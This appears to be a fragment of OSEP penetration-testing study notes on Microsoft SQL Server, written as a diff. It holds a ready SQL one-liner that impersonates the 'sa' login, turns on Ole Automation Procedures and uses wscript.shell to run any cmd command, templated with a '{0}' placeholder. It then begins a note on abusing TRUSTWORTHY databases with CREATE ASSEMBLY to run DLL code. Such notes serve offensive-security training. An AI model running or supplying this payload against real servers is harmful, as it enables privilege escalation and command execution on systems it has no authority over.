ScottyKarate/OSEP/Microsoft SQL/MSSQL_ReadMe.md

 ```sql
 EXECUTE AS LOGIN = 'sa'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE; DECLARE @myshell INT; EXEC sp_oacreate 'wscript.shell', @myshell OUTPUT; EXEC sp_oamethod @myshell, 'run', null, 'cmd /c \"{0}\"'"
 ```

+<br><br>

+## Custom assemblies

+**If a database has the TRUSTWORTHY property set, it's possible to use the CREATE ASSEMBLY statement to import a managed DLL as an object inside the SQL server and execute methods within it**